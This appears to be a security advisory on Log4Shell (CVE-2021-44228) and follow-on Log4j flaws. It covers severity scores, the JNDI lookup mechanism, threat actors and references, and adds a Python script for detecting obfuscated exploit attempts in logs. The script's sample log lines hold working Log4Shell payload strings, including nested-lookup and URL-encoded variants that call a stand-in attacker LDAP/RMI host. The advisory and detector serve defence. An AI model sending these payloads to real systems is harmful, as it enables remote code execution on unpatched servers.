10.0 Critical
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
9.3 High
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:M/Au:N/C:C/I:C/A:C
A zero-day remote code execution vulnerability, CVE-2021-44228 (also known as Log4Shell), was discovered in Apache Log4j 2 and affects versions 2.0-beta9 through 2.14.1. Apache Log4j is a Java logging package used by millions of applications. Products and services including Steam, Apple iCloud, Minecraft, Apache Struts and Elasticsearch, as well as offerings from VMware, Twitter, Cisco, Google, Amazon, LinkedIn, NetApp and many others, were found to be exposed to this flaw.
The vulnerability could allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system. It exists because the JNDI features that Log4j uses in configuration, log messages and parameters do not protect against attacker-controlled LDAP servers and other JNDI-related endpoints: when Log4j evaluates a lookup such as ${jndi:ldap://...} embedded in logged data, it connects to the named server and can load and execute the object it returns.
To exploit the issue an attacker needs a reachable endpoint on the target, over any protocol (HTTP, TCP, etc.), that accepts attacker-supplied data, and a log statement that logs that data (for example a User-Agent header or a form field written to the application log). The JVM must also be able to reach the attacker's LDAP or RMI server, so egress filtering reduces exposure but does not remove it; the dns variant of the lookup still leaks data even where no code is loaded.
Users can check whether their systems are affected by matching the log4j-core JAR hashes published in the CVE-2021-44228-Log4Shell-Hashes repository (see the references below) against their software inventory. To look for exploitation attempts in logs on Linux systems, run: sudo grep -E -I -i -r '\$\{jndi:(ldap[s]?|rmi|dns):/' /var/log/ . Note that this pattern only catches the literal form of the lookup; attackers obfuscate the string with nested lookups such as ${${lower:j}ndi:...} or ${${::-j}ndi:...} and with URL encoding, which a plain grep misses.
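The grep above finds only the literal ${jndi: prefix. The following Python script, added here as an example and not part of this advisory or of the Log4j project, folds the obfuscation tricks seen in the wild (the ${x:-default} default-value syntax, ${lower:}/${upper:} case lookups, and URL encoding) back into a literal lookup before matching, so the same check catches the ${${lower:j}ndi:...} and ${${::-j}ndi:...} variants. The log lines it scans are constructed samples; the scheme list and the folding rules are the script's own assumptions, a detection heuristic rather than a reimplementation of Log4j's lookup engine.

```python
import re
import urllib.parse

# Lookup schemes used in CVE-2021-44228 payloads: ldap/rmi deliver the
# remote object, dns is used for blind probing and exfiltration. The list
# is this script's assumption, not Log4j's own.
JNDI_RE = re.compile(
    r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|https?)\s*:", re.I
)

# An innermost ${...} lookup, i.e. one with no nested ${ inside it.
INNER_RE = re.compile(r"\$\{([^${}]*)\}")

MAX_ROUNDS = 20  # bound on the nesting depth we are willing to unfold


def _fold_one(m):
    """Resolve a single innermost lookup the way an attacker relies on."""
    body = m.group(1)
    # ${name:-default}: Log4j substitutes the default when the lookup is
    # undefined, so ${::-j} and ${env:NOPE:-j} both yield "j".
    if ":-" in body:
        return body.split(":-", 1)[1]
    # ${lower:X} / ${upper:x} case-conversion lookups.
    case = re.match(r"\s*(lower|upper)\s*:(.*)\Z", body, re.I | re.S)
    if case:
        text = case.group(2)
        return text.lower() if case.group(1).lower() == "lower" else text.upper()
    # Anything else (including the jndi lookup itself) is kept verbatim.
    return m.group(0)


def normalize(line: str) -> str:
    """Undo URL encoding and unfold nested lookups so an obfuscated payload
    ends up as the literal ${jndi:scheme:...} string that JNDI_RE expects."""
    text = line
    for _ in range(3):  # proxies and WAF logs often double-encode
        decoded = urllib.parse.unquote(text)
        if decoded == text:
            break
        text = decoded
    for _ in range(MAX_ROUNDS):
        folded = INNER_RE.sub(_fold_one, text)
        if folded == text:
            break
        text = folded
    return text


def is_log4shell_attempt(line: str) -> bool:
    return JNDI_RE.search(normalize(line)) is not None


def scan(lines):
    """Return (line_number, normalized_line) for every suspicious line."""
    hits = []
    for number, raw in enumerate(lines, 1):
        folded = normalize(raw)
        if JNDI_RE.search(folded):
            hits.append((number, folded))
    return hits


# Constructed sample log lines (HTTP access-log style); not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.10:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://203.0.113.10:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://203.0.113.10:1099/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:05 +0000] "GET /?x=%24%7Bjndi%3Adns%3A%2F%2Fexample.test%2Fa%7D HTTP/1.1" 200 512 "-" "curl/7.79"',
    '10.0.0.7 - - [10/Dec/2021:12:00:06 +0000] "GET /docs/${date:yyyy} HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for number, folded in scan(SAMPLE_LOG):
        print(f"line {number}: {folded}")
```

Feed it real log files by replacing SAMPLE_LOG with the lines of each file under /var/log/; the benign ${date:yyyy} lookup on the last sample line shows that only jndi lookups are reported, not every ${...} string.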
We recommend that users take the following actions:
The incomplete fix for CVE-2021-44228 led to a new issue, tracked as CVE-2021-45046, which affects versions 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0 and was resolved in 2.16.0 (2.12.2 for Java 7). An attacker with control over Thread Context Map (MDC) input data, when the logging configuration uses a non-default Pattern Layout with a Context Lookup or a Thread Context Map pattern, can craft input using a JNDI lookup pattern. Initially rated as a denial of service, the issue was later found to allow information leakage and, in some environments, remote code execution.
Apache Log4j2 is affected by another flaw, CVE-2021-45105, which affects versions 2.0-alpha1 through 2.16.0 (excluding 2.12.3 and 2.3.1) and was resolved in 2.17.0, 2.12.3 and 2.3.1. Log4j did not always protect against infinite recursion in lookup evaluation, so an attacker with control over Thread Context Map (MDC) input data can craft input containing a self-referential lookup, causing uncontrolled recursion that ends in a StackOverflowError and terminates the process.
A separate vulnerability, CVE-2021-4104, affects Log4j 1.2 and allows remote code execution only when the application is specifically configured to use JMSAppender, which is not the default. An attacker with write access to the Log4j configuration can set the TopicBindingName and TopicConnectionFactoryBindingName parameters so that JMSAppender performs JNDI requests, resulting in deserialization of untrusted data and code execution in a similar fashion to CVE-2021-44228. Log4j 1.2 reached end of life in August 2015 and receives no fix; migrate to Log4j 2.
Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding the security fix releases 2.3.2 and 2.12.4) are vulnerable to remote code execution (CVE-2021-44832): an attacker with permission to modify the logging configuration file can construct a malicious configuration using a JDBC Appender whose data source references a JNDI URI, which can execute remote code. The issue is fixed by limiting JNDI data source names to the java protocol in the fixed Log4j2 2.x releases.
State-sponsored actors such as APT35 and HAFNIUM are actively targeting this vulnerability. Observed payloads include the Kinsing cryptominer, the Mirai and Tsunami botnets, Khonsari and Dridex malware, and post-exploitation tooling such as Cobalt Strike and Mimikatz. Ransomware families including Conti and TellYouThePass are also exploiting the vulnerability.
The MITRE ATT&CK techniques currently observed in these attacks are:
T1190 - Exploit Public-Facing Application
T1203 - Exploitation for Client Execution
T1059 - Command and Scripting Interpreter
T1496 - Resource Hijacking
T1498 - Network Denial of Service
T1505 - Server Software Component
T1140 - Deobfuscate/Decode Files or Information
T1553 - Subvert Trust Controls
T1059.001 - PowerShell
T1486 - Data Encrypted for Impact
T1090.004 - Domain Fronting
T1114 - Email Collection
T1550.002 - Pass the Hash
T1210 - Exploitation of Remote Services
T1135 - Network Share Discovery
T1083 - File and Directory Discovery
T1482 - Domain Trust Discovery
T1055 - Process Injection
T1068 - Exploitation for Privilege Escalation
Patch
<https://logging.apache.org/log4j/2.x/manual/migration.html>
<https://github.com/apache/logging-log4j2/pull/607/files>
<https://repo1.maven.org/maven2/org/apache/logging/log4j/log4j-core/2.15.0/>
<https://logging.apache.org/log4j/2.x/security.html>
<https://www.lunasec.io/docs/blog/log4j-zero-day/>
<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>
<https://thehackernews.com/2021/12/hackers-exploit-log4j-vulnerability-to.html?m=1>
<https://cert-agid.gov.it/download/log4shell-iocs.txt>
<https://otx.alienvault.com/indicator/cve/CVE-2021-44228>
<https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b>
<https://www.huntress.com/blog/rapid-response-critical-rce-vulnerability-is-affecting-java>
<https://github.com/mubix/CVE-2021-44228-Log4Shell-Hashes>
<https://gist.github.com/nathanqthai/01808c569903f41a52e7e7b575caa890>
<https://github.com/YfryTchsGD/Log4jAttackSurface>
<https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592>
<https://www.govcert.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/>
<https://security.netapp.com/advisory/ntap-20211210-0007/>
<https://www.vmware.com/security/advisories/VMSA-2021-0028.html>
<https://www.sentinelone.com/blog/cve-2021-44228-staying-secure-apache-log4j-vulnerability/>
<https://www.oracle.com/security-alerts/alert-cve-2021-44228.html>
<https://github.com/pravin-pp/log4j2-CVE-2021-45105>
<http://zdnet.com/article/belgian-defense-ministry-confirms-cyberattack-through-log4j-exploitation>
<https://www.techsolvency.com/story-so-far/cve-2021-44228-log4j-log4shell/>